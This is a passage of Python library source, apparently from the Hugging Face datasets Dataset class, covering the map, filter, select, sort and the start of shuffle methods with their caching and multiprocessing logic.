a last batch smaller than the batch_size should be dropped instead of being processed by the function. remove_columns (`Optional[Union[str, List[str]]]`, default `None`): Remove a selection of columns while doing the mapping. Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding columns with names in `remove_columns`, these columns will be kept. keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, default `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, default `False`): Disallow null values in the table. fn_kwargs (`Optional[Dict]`, default `None`): Keyword arguments to be passed to `function`. num_proc (`Optional[int]`, default `None`): Max number of processes when generating cache. Already cached shards are loaded sequentially suffix_template (:obj:`str`): If cache_file_name is specified, then this suffix will be added at the end of the base name of each: defaults to "_{rank:05d}_of_{num_proc:05d}". For example, if cache_file_name is "processed.arrow", then for rank=1 and num_proc=4, the resulting file would be "processed_00001_of_00004.arrow" for the default suffix. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while mapping examples. """ if keep_in_memory and cache_file_name is not None: raise ValueError("Please use either `keep_in_memory` or `cache_file_name` but not both.") if num_proc is not None and num_proc <= 0: raise ValueError("num_proc must be an integer > 0.") # If the array is empty we do nothing if len(self) == 0: return self if function is None: function = lambda x: x # noqa: E731 def decorate(f): """ Decorate the mapped function, so that its first argument is wrapped with a LazyDict to be used internally but a standard dictionary is returned at the end of the mapping. """ @wraps(f) def decorated(item, *args, **kwargs): # Decorate first arg with LazyDict (either Example or Batch) decorated_item = ( Example(item, features=self.features) if not batched else Batch(item, features=self.features) ) # Use the LazyDict internally, while mapping the function result = f(decorated_item, *args, **kwargs) # Return a standard dict return result.data if isinstance(result, LazyDict) else result return decorated function = decorate(function) if not self._format_type and not input_columns else function if isinstance(input_columns, str): input_columns = [input_columns] if input_columns is not None: for input_column in input_columns: if input_column not in self._data.column_names: raise ValueError( f"Input column {input_column} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) if isinstance(remove_columns, str): remove_columns = [remove_columns] if remove_columns is not None and any(col not in self._data.column_names for col in remove_columns): raise ValueError( f"Column to remove {list(filter(lambda col: col not in self._data.column_names, remove_columns))} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) load_from_cache_file = load_from_cache_file if load_from_cache_file is not None else is_caching_enabled() if fn_kwargs is None: fn_kwargs = {} if num_proc is not None and num_proc > len(self): num_proc = len(self) logger.warning( f"num_proc must be <= {len(self)}. Reducing num_proc to {num_proc} for dataset of size {len(self)}." ) disable_tqdm = bool(logging.get_verbosity() == logging.NOTSET) or not utils.is_progress_bar_enabled() if num_proc is None or num_proc == 1: return self._map_single( function=function, with_indices=with_indices, with_rank=with_rank, input_columns=input_columns, batched=batched, batch_size=batch_size, drop_last_batch=drop_last_batch, remove_columns=remove_columns, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, features=features, disable_nullable=disable_nullable, fn_kwargs=fn_kwargs, new_fingerprint=new_fingerprint, disable_tqdm=disable_tqdm, desc=desc, ) else: def format_cache_file_name(cache_file_name, rank): sep = cache_file_name.rindex(".") base_name, extension = cache_file_name[:sep], cache_file_name[sep:] cache_file_name = base_name + suffix_template.format(rank=rank, num_proc=num_proc) + extension logger.info(f"Process #{rank} will write at {cache_file_name}") return cache_file_name def format_new_fingerprint(new_fingerprint, rank): return new_fingerprint + suffix_template.format(rank=rank, num_proc=num_proc) prev_env = deepcopy(os.environ) # check if parallelism if off # from https://github.com/huggingface/tokenizers/blob/bb668bc439dc34389b71dbb8ce0c597f15707b53/tokenizers/src/utils/parallelism.rs#L22 if prev_env.get("TOKENIZERS_PARALLELISM", "false").lower() not in ( "", "off", "false", "f", "no", "n", "0", ): logger.warning("Setting TOKENIZERS_PARALLELISM=false for forked processes.") os.environ["TOKENIZERS_PARALLELISM"] = "false" initargs, initializer = None, None if not disable_tqdm: initargs, initializer = (RLock(),), tqdm.set_lock shards = [ self.shard(num_shards=num_proc, index=rank, contiguous=True, keep_in_memory=keep_in_memory) for rank in range(num_proc) ] kwds_per_shard = [ dict( self=shards[rank], function=function, with_indices=with_indices, with_rank=with_rank, input_columns=input_columns, batched=batched, batch_size=batch_size, drop_last_batch=drop_last_batch, remove_columns=remove_columns, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=format_cache_file_name(cache_file_name, rank) if cache_file_name is not None else None, writer_batch_size=writer_batch_size, features=features.copy() if features is not None else None, disable_nullable=disable_nullable, fn_kwargs=fn_kwargs, rank=rank, offset=sum(len(s) for s in shards[:rank]), disable_tqdm=disable_tqdm, new_fingerprint=format_new_fingerprint(new_fingerprint, rank) if new_fingerprint is not None else None, desc=desc, ) for rank in range(num_proc) ] # We search for already cached shards def catch_non_existent_error(func, kwargs): try: return func(**kwargs) except NonExistentDatasetError: return None transformed_shards = [ catch_non_existent_error(self.__class__._map_single, dict(cache_only=True, **kwds)) for kwds in kwds_per_shard ] # We try to create a pool with as many workers as dataset not yet cached. nb_of_missing_shards = transformed_shards.count(None) if nb_of_missing_shards > 0: with Pool(nb_of_missing_shards, initargs=initargs, initializer=initializer) as pool: os.environ = prev_env logger.info(f"Spawning {num_proc} processes") results = { i: pool.apply_async(self.__class__._map_single, kwds=kwds) for i, (kwds, cached_shard) in enumerate(zip(kwds_per_shard, transformed_shards)) if cached_shard is None } assert ( len(results) == nb_of_missing_shards ), "The number of missing cached shards needs to correspond to the number of `_map_single` we're running" for index, async_result in results.items(): transformed_shards[index] = async_result.get() assert ( transformed_shards.count(None) == 0 ), "All shards have to be defined Datasets, none should still be missing." logger.info(f"Concatenating {num_proc} shards") result = concatenate_datasets(transformed_shards) if new_fingerprint is not None: result._fingerprint = new_fingerprint return result @transmit_tasks @transmit_format @fingerprint_transform( inplace=False, ignore_kwargs=["load_from_cache_file", "cache_file_name", "disable_tqdm", "desc", "cache_only"] ) def _map_single( self, function: Optional[Callable] = None, with_indices: bool = False, with_rank: bool = False, input_columns: Optional[List[str]] = None, batched: bool = False, batch_size: Optional[int] = 1000, drop_last_batch: bool = False, remove_columns: Optional[List[str]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = None, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, fn_kwargs: Optional[dict] = None, new_fingerprint: Optional[str] = None, rank: Optional[int] = None, offset: int = 0, disable_tqdm: bool = False, desc: Optional[str] = None, cache_only: bool = False, ) -> "Dataset": """Apply a function to all the elements in the table (individually or in batches) and update the table (if function does update examples). Args: function (:obj:`Callable`): with one of the following signature: - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False` and `with_rank=False` - `function(example: Union[Dict, Any], *extra_args) -> Union[Dict, Any]` if `batched=False` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False` and `with_rank=False` - `function(batch: Union[Dict[List], List[Any]], *extra_args) -> Union[Dict, Any]` if `batched=True` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) If no function is provided, default to identity function: lambda x: x with_indices (:obj:`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx[, rank]): ...`. with_rank (:obj:`bool`, default `False`): Provide process rank to `function`. Note that in this case the signature of `function` should be `def function(example[, idx], rank): ...`. input_columns (`Optional[List[str]]`, defaults to `None`): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, defaults to `False`): Provide batch of examples to `function` batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True` `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function` drop_last_batch (:obj:`bool`, default: `False`): Whether a last batch smaller than the batch_size should be dropped instead of being processed by the function. remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping. Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding columns with names in `remove_columns`, these columns will be kept. keep_in_memory (:obj:`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, defaults to `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, defaults to `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, defaults to `False`): Disallow null values in the table. fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function` new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments rank: (`Optional[int]`, defaults to `None`): If specified, this is the process rank when doing multiprocessing offset: (:obj:`int`, defaults to 0): If specified, this is an offset applied to the indices passed to `function` if `with_indices=True`. disable_tqdm (:obj:`bool`, defaults to `False`): Whether to silence tqdm's output. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while mapping examples. cache_only (`bool`, defaults to `False`): Flag in order to notifiy the method will either find a cached dataset or raise `NonExistentDatasetError` exception, """ # Reduce logging to keep things readable in multiprocessing with tqdm if rank is not None and logging.get_verbosity() < logging.WARNING: logging.set_verbosity_warning() # Print at least one thing to fix tqdm in notebooks in multiprocessing # see https://github.com/tqdm/tqdm/issues/485#issuecomment-473338308 if rank is not None and not disable_tqdm and "notebook" in tqdm.__name__: print(" ", end="", flush=True) if fn_kwargs is None: fn_kwargs = {} # If we do batch computation but no batch size is provided, default to the full dataset if batched and (batch_size is None or batch_size <= 0): batch_size = self.num_rows # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if cache_file_name is None: # we create a unique hash from the function, # current dataset file and the mapping args cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached processed dataset at {cache_file_name}") info = self.info.copy() info.features = features info.task_templates = None return Dataset.from_file(cache_file_name, info=info, split=self.split) # Raise an error if we were supposed to return a cached dataset and none was found if cache_only: raise NonExistentDatasetError # We set this variable to True after processing the first example/batch in # `apply_function_on_filtered_inputs` if the map function returns a dict. # If set to False, no new arrow table will be created update_data = None class NumExamplesMismatchError(Exception): pass def validate_function_output(processed_inputs, indices): """Validate output of the map function.""" if processed_inputs is not None and not isinstance(processed_inputs, (Mapping, pa.Table)): raise TypeError( f"Provided `function` which is applied to all elements of table returns a variable of type {type(processed_inputs)}. Make sure provided `function` returns a variable of type `dict` (or a pyarrow table) to update the dataset or `None` if you are only interested in side effects." ) elif isinstance(indices, list) and isinstance(processed_inputs, Mapping): allowed_batch_return_types = (list, np.ndarray) all_dict_values_are_lists = all( isinstance(value, allowed_batch_return_types) for value in processed_inputs.values() ) if all_dict_values_are_lists is False: raise TypeError( f"Provided `function` which is applied to all elements of table returns a `dict` of types {[type(x) for x in processed_inputs.values()]}. When using `batched=True`, make sure provided `function` returns a `dict` of types like `{allowed_batch_return_types}`." ) def apply_function_on_filtered_inputs(inputs, indices, check_same_num_examples=False, offset=0): """Utility to apply the function on a selection of columns.""" nonlocal update_data fn_args = [inputs] if input_columns is None else [inputs[col] for col in input_columns] if offset == 0: effective_indices = indices else: effective_indices = [i + offset for i in indices] if isinstance(indices, list) else indices + offset additional_args = () if with_indices: additional_args += (effective_indices,) if with_rank: additional_args += (rank,) processed_inputs = function(*fn_args, *additional_args, **fn_kwargs) if update_data is None: # Check if the function returns updated examples update_data = isinstance(processed_inputs, (Mapping, pa.Table)) validate_function_output(processed_inputs, indices) if not update_data: return None # Nothing to update, let's move on if self._format_type is not None: inputs = self._getitem( key=(indices if isinstance(indices, int) else slice(indices[0], indices[-1] + 1)), format_type=None, format_columns=None, format_kwargs=None, decoded=False, ) if remove_columns is not None: for column in remove_columns: inputs.pop(column) if check_same_num_examples: input_num_examples = len(inputs[next(iter(inputs.keys()))]) processed_inputs_num_examples = len(processed_inputs[next(iter(processed_inputs.keys()))]) if input_num_examples != processed_inputs_num_examples: raise NumExamplesMismatchError() if isinstance(inputs, dict) and isinstance(processed_inputs, Mapping): inputs.update(processed_inputs) return inputs else: return processed_inputs def init_buffer_and_writer(): # Prepare output buffer and batched writer in memory or on file if we update the table writer_features = features if writer_features is None: writer_features = self.features update_features = True else: update_features = False if keep_in_memory or cache_file_name is None: buf_writer = pa.BufferOutputStream() tmp_file = None writer = ArrowWriter( features=writer_features, stream=buf_writer, writer_batch_size=writer_batch_size, update_features=update_features, fingerprint=new_fingerprint, disable_nullable=disable_nullable, ) else: buf_writer = None logger.info(f"Caching processed dataset at {cache_file_name}") tmp_file = tempfile.NamedTemporaryFile("wb", dir=os.path.dirname(cache_file_name), delete=False) writer = ArrowWriter( features=writer_features, path=tmp_file.name, writer_batch_size=writer_batch_size, update_features=update_features, fingerprint=new_fingerprint, disable_nullable=disable_nullable, ) return buf_writer, writer, tmp_file # If `update_data` is True after processing the first example/batch, initalize these resources with `init_buffer_and_writer` buf_writer, writer, tmp_file = None, None, None # Optionally initialize the writer as a context manager with contextlib.ExitStack() as stack: try: # Only load the columns we actually need if input_columns: input_dataset = self.with_format( self._format_type, columns=input_columns, output_all_columns=False, **self._format_kwargs ) if remove_columns: remove_columns = list(set(remove_columns) & set(input_columns)) else: input_dataset = self # Loop over single examples or batches and write to buffer/file if examples are to be updated pbar_iterable = input_dataset if not batched else range(0, len(input_dataset), batch_size) pbar_unit = "ex" if not batched else "ba" pbar_desc = (desc or "") + " #" + str(rank) if rank is not None else desc pbar = utils.tqdm( pbar_iterable, disable=disable_tqdm, position=rank, unit=pbar_unit, desc=pbar_desc, ) if not batched: for i, example in enumerate(pbar): example = apply_function_on_filtered_inputs(example, i, offset=offset) if update_data: if i == 0: buf_writer, writer, tmp_file = init_buffer_and_writer() stack.enter_context(writer) if isinstance(example, pa.Table): writer.write_row(example) else: writer.write(example) else: for i in pbar: if drop_last_batch and i + batch_size > input_dataset.num_rows: continue batch = input_dataset._getitem( slice(i, i + batch_size), decoded=False, ) indices = list( range(*(slice(i, i + batch_size).indices(input_dataset.num_rows))) ) # Something simpler? try: batch = apply_function_on_filtered_inputs( batch, indices, check_same_num_examples=len(input_dataset.list_indexes()) > 0, offset=offset, ) except NumExamplesMismatchError: raise DatasetTransformationNotAllowedError( "Using `.map` in batched mode on a dataset with attached indexes is allowed only if it doesn't create or remove existing examples. You can first run `.drop_index() to remove your index and then re-add it." ) from None if update_data: if i == 0: buf_writer, writer, tmp_file = init_buffer_and_writer() stack.enter_context(writer) if isinstance(batch, pa.Table): writer.write_table(batch) else: writer.write_batch(batch) if update_data and writer is not None: writer.finalize() # close_stream=bool(buf_writer is None)) # We only close if we are writing in a file except (Exception, KeyboardInterrupt): if update_data: if writer is not None: writer.finalize() if tmp_file is not None: tmp_file.close() if os.path.exists(tmp_file.name): os.remove(tmp_file.name) raise if update_data and tmp_file is not None: tmp_file.close() shutil.move(tmp_file.name, cache_file_name) umask = os.umask(0o666) os.umask(umask) os.chmod(cache_file_name, 0o666 & ~umask) if update_data: # Create new Dataset from buffer or file info = self.info.copy() info.features = writer._features info.task_templates = None if buf_writer is None: return Dataset.from_file(cache_file_name, info=info, split=self.split) else: return Dataset.from_buffer(buf_writer.getvalue(), info=info, split=self.split) else: return self @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["load_from_cache_file", "cache_file_name"], version="2.0.1") def filter( self, function: Optional[Callable] = None, with_indices=False, input_columns: Optional[Union[str, List[str]]] = None, batched: bool = False, batch_size: Optional[int] = 1000, remove_columns: Optional[List[str]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, fn_kwargs: Optional[dict] = None, num_proc: Optional[int] = None, suffix_template: str = "_{rank:05d}_of_{num_proc:05d}", new_fingerprint: Optional[str] = None, desc: Optional[str] = None, ) -> "Dataset": """Apply a filter function to all the elements in the table in batches and update the table so that the dataset only includes examples according to the filter function. Args: function (:obj:`Callable`): Callable with one of the following signatures: - ``function(example: Union[Dict, Any]) -> bool`` if ``with_indices=False, batched=False`` - ``function(example: Union[Dict, Any], indices: int) -> bool`` if ``with_indices=True, batched=False`` - ``function(example: Union[Dict, Any]) -> List[bool]`` if ``with_indices=False, batched=True`` - ``function(example: Union[Dict, Any], indices: int) -> List[bool]`` if ``with_indices=True, batched=True`` If no function is provided, defaults to an always True function: ``lambda x: True``. with_indices (:obj:`bool`, default `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`. input_columns (:obj:`str` or `List[str]`, optional): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, defaults to `False`): Provide batch of examples to `function` batch_size (:obj:`int`, optional, default `1000`): Number of examples per batch provided to `function` if ``batched = True``. If ``batched = False``, one example per batch is passed to ``function``. If ``batch_size <= 0`` or ``batch_size == None``: provide the full dataset as a single batch to `function` keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. fn_kwargs (:obj:`dict`, optional): Keyword arguments to be passed to `function` num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. suffix_template (:obj:`str`): If `cache_file_name` is specified, then this suffix will be added at the end of the base name of each. For example, if `cache_file_name` is `"processed.arrow"`, then for ``rank = 1`` and ``num_proc = 4``, the resulting file would be `"processed_00001_of_00004.arrow"` for the default suffix (default `_{rank:05d}_of_{num_proc:05d}`) new_fingerprint (:obj:`str`, optional): The new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while filtering examples. """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.filter` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it.`" ) if function is None: function = lambda x: True # noqa: E731 if remove_columns is not None: raise ValueError("Parameter `remove_columns` passed to .filter() is no longer supported.") indices = self.map( function=partial( get_indices_from_mask_function, function, batched, with_indices, input_columns, self._indices ), with_indices=True, features=Features({"indices": Value("uint64")}), batched=True, batch_size=batch_size, remove_columns=self.column_names, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, fn_kwargs=fn_kwargs, num_proc=num_proc, suffix_template=suffix_template, new_fingerprint=new_fingerprint, input_columns=input_columns, desc=desc, ) new_dataset = copy.deepcopy(self) new_dataset._indices = indices.data new_dataset._fingerprint = new_fingerprint return new_dataset @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["cache_file_name"]) def flatten_indices( self, keep_in_memory: bool = False, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create and cache a new Dataset by flattening the indices mapping. Args: keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, default `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, default `False`): Allow null values in the table. new_fingerprint (`Optional[str]`, default `None`): The new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ return self.map( batched=True, # for speed keep_in_memory=keep_in_memory, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, features=features, disable_nullable=disable_nullable, new_fingerprint=new_fingerprint, desc="Flattening the indices", ) def _new_dataset_with_indices( self, indices_cache_file_name: Optional[str] = None, indices_buffer: Optional[pa.Buffer] = None, fingerprint: Optional[str] = None, ) -> "Dataset": """Return a new Dataset obtained by adding indices (provided in indices_cache_file_name or in a buffer) to the current Dataset. """ if indices_cache_file_name is None and indices_buffer is None: raise ValueError("At least one of indices_cache_file_name or indices_buffer must be provided.") if fingerprint is None: raise ValueError("please specify a fingerprint for the dataset with indices") if indices_cache_file_name is not None: indices_table = MemoryMappedTable.from_file(indices_cache_file_name) else: indices_table = InMemoryTable.from_buffer(indices_buffer) # Return new Dataset object # don't forget to copy the objects return Dataset( self._data, info=self.info.copy(), split=self.split, indices_table=indices_table, fingerprint=fingerprint, ) @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["indices_cache_file_name"]) def select( self, indices: Iterable, keep_in_memory: bool = False, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new dataset with rows selected following the list/array of indices. Args: indices (sequence, iterable, ndarray or Series): List or 1D-array of integer indices for indexing. keep_in_memory (:obj:`bool`, default `False`): Keep the indices mapping in memory instead of writing it to a cache file. indices_cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the indices mapping instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if keep_in_memory and indices_cache_file_name is not None: raise ValueError("Please use either `keep_in_memory` or `indices_cache_file_name` but not both.") if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.select` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self # Prepare the writer for our indices arrow table if keep_in_memory or indices_cache_file_name is None: buf_writer = pa.BufferOutputStream() tmp_file = None writer = ArrowWriter( stream=buf_writer, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit="indices" ) else: buf_writer = None logger.info(f"Caching indices mapping at {indices_cache_file_name}") tmp_file = tempfile.NamedTemporaryFile("wb", dir=os.path.dirname(indices_cache_file_name), delete=False) writer = ArrowWriter( path=tmp_file.name, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit="indices" ) indices_array = pa.array(indices, type=pa.uint64()) # Check if we need to convert indices if self._indices is not None: indices_array = self._indices.column(0).take(indices_array) indices_table = pa.Table.from_arrays([indices_array], names=["indices"]) with writer: try: writer.write_table(indices_table) writer.finalize() # close_stream=bool(buf_writer is None)) We only close if we are writing in a file except (Exception, KeyboardInterrupt): if tmp_file is not None: tmp_file.close() if os.path.exists(tmp_file.name): os.remove(tmp_file.name) raise if tmp_file is not None: tmp_file.close() shutil.move(tmp_file.name, indices_cache_file_name) umask = os.umask(0o666) os.umask(umask) os.chmod(indices_cache_file_name, 0o666 & ~umask) # Return new Dataset object if buf_writer is None: return self._new_dataset_with_indices( indices_cache_file_name=indices_cache_file_name, fingerprint=new_fingerprint ) else: return self._new_dataset_with_indices(indices_buffer=buf_writer.getvalue(), fingerprint=new_fingerprint) @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["load_from_cache_file", "indices_cache_file_name"]) def sort( self, column: str, reverse: bool = False, kind: str = None, null_placement: str = "last", keep_in_memory: bool = False, load_from_cache_file: bool = True, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new dataset sorted according to a column. Currently sorting according to a column name uses pandas sorting algorithm under the hood. The column should thus be a pandas compatible type (in particular not a nested type). This also means that the column used for sorting is fully loaded in memory (which should be fine in most cases). Args: column (:obj:`str`): column name to sort by. reverse (:obj:`bool`, default `False`): If True, sort by descending order rather then ascending. kind (:obj:`str`, optional): Pandas algorithm for sorting selected in {‘quicksort’, ‘mergesort’, ‘heapsort’, ‘stable’}, The default is ‘quicksort’. Note that both ‘stable’ and ‘mergesort’ use timsort under the covers and, in general, the actual implementation will vary with data type. The ‘mergesort’ option is retained for backwards compatibility. null_placement (:obj:`str`, default `last`): Put `None` values at the beginning if ‘first‘; ‘last‘ puts `None` values at the end. .. versionadded:: 1.14.2 keep_in_memory (:obj:`bool`, default `False`): Keep the sorted indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the sorted indices can be identified, use it instead of recomputing. indices_cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the sorted indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. Higher value gives smaller cache files, lower value consume less temporary memory. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.sort` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self # Check the column name if not isinstance(column, str) or column not in self._data.column_names: raise ValueError( f"Column '{column}' not found in the dataset. Please provide a column selected in: {self._data.column_names}" ) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args indices_cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(indices_cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached sorted indices for dataset at {indices_cache_file_name}") return self._new_dataset_with_indices( fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name ) column_data = self._getitem( column, format_type="pandas", format_columns=None, output_all_columns=False, format_kwargs=None ) df_sorted = column_data.to_frame().sort_values( column, ascending=not reverse, kind=kind, na_position=null_placement ) indices = df_sorted.index.to_numpy() return self.select( indices=indices, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=new_fingerprint, ) @transmit_format @fingerprint_transform( inplace=False, randomized_function=True, ignore_kwargs=["load_from_cache_file", "indices_cache_file_name"] ) def shuffle( self, seed: Optional[int] = None, generator: Optional[np.random.Generator] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new Dataset where the rows are shuffled. Currently shuffling uses numpy random generators. You can either supply a NumPy BitGenerator to use, or a seed to initiate NumPy's default random generator (PCG64). Args: seed (:obj:`int`, optional): A seed to initialize the default BitGenerator if ``generator=None``. If None, then fresh, unpredictable entropy will be pulled from the OS. If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state. generator (:obj:`numpy.random.Generator`, optional): Numpy random Generator to use to compute the permutation of the dataset rows. If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy). keep_in_memory (:obj:`bool`, default `False`): Keep the shuffled indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the shuffled indices can be identified, use it instead of recomputing. indices_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the shuffled indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. new_fingerprint (:obj:`str`, optional, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.shuffle` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self if seed is not None and generator is not None: raise ValueError("Both `seed` and `generator` were provided. Please specify just one of them.") if generator is not None and not isinstance(generator, np.random.Generator): raise ValueError("The provided generator must be an instance of numpy.random.Generator") if generator is None: if seed is None: seed = np.random.get_state()[1][0] _ = np.random.random() # do 1 step of rng generator = np.random.default_rng(seed) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args indices_cache_file_name = 